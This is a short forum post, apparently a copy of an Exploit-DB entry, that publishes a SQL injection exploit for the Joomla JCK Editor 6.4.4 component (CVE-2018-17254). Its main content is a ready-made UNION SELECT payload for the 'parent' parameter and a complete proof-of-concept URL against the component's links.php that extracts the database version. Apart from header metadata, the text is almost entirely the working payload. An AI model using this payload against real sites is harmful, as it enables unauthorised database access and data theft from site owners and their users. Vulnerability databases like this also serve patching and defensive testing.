Exploit Joomla! Component JCK Editor 6.4.4 - 'parent' SQL Injection

Exploiter

Хакер
34,599
0
18 Дек 2022
EDB-ID
45423
Проверка EDB
  1. Пройдено
Автор
HAMZA MEGAHED
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2018-17254
Дата публикации
2018-09-17
Joomla! Component JCK Editor 6.4.4 - 'parent' SQL Injection
Код:
# Title: Joomla Component JCK Editor 6.4.4 - 'parent' SQL Injection
# Date: 2018-09-14
# Exploit Author: Hamza Megahed
# Vendor Homepage:https://www.joomla.org/
# Download: https://arkextensions.com/products/jck-editor
# Version: 6.4.4
# Tested on: Ubuntu, FireFox,
# CVE: N/A

# Parameter = parent
# Payload = " UNION SELECT NULL,NULL,@@version,NULL,NULL,NULL,NULL,NULL -- aa
# Poc:

Test = [HOST]/[PATH]/plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent=%22%20UNION%20SELECT%20NULL,NULL,@@version,NULL,NULL,NULL,NULL,NULL--%20aa
 
Источник
www.exploit-db.com

Похожие темы